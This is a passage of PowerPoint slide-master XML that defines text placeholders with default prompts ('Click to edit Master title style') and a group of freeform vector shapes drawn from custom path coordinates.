          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="110400"/>
            <a:ext cx="3048001" cy="355158"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2896277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53523" cy="2162131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="392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28262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30864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p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090210" y="126993"/>
            <a:ext cx="9043734" cy="6634630"/>
            <a:chOff x="1951" y="0"/>
            <a:chExt cx="5890" cy="4321"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 218"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="2190"/>
              <a:ext cx="5871" cy="2131"/>
              <a:chOff x="1951" y="2190"/>
              <a:chExt cx="5871" cy="2131"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1561" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="219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25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140"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26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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28"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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29"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="382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30"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070"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Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="560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Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="2202"/>
                <a:ext cx="188" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 86 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 86 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 136 h 220"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 136 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 136 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 136 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 86 h 220"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 86 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 86 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 86 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 136 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 136 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>
                  <a:gd name="T67" fmla="*/ 8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20">
                    <a:moveTo>
                      <a:pt x="188" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159"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Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="2198"/>
                <a:ext cx="154"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Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701"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Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045"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Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="219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Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392"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2" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589"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Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739"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Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="2190"/>
                <a:ext cx="219" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 208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1 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 63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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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6"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="188"/>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200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53"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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="6" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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0" y="23"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="150"/>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8"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="191"/>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1"/>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0"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="71"/>
                      <a:pt x="90" y="74"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="141"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="129"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
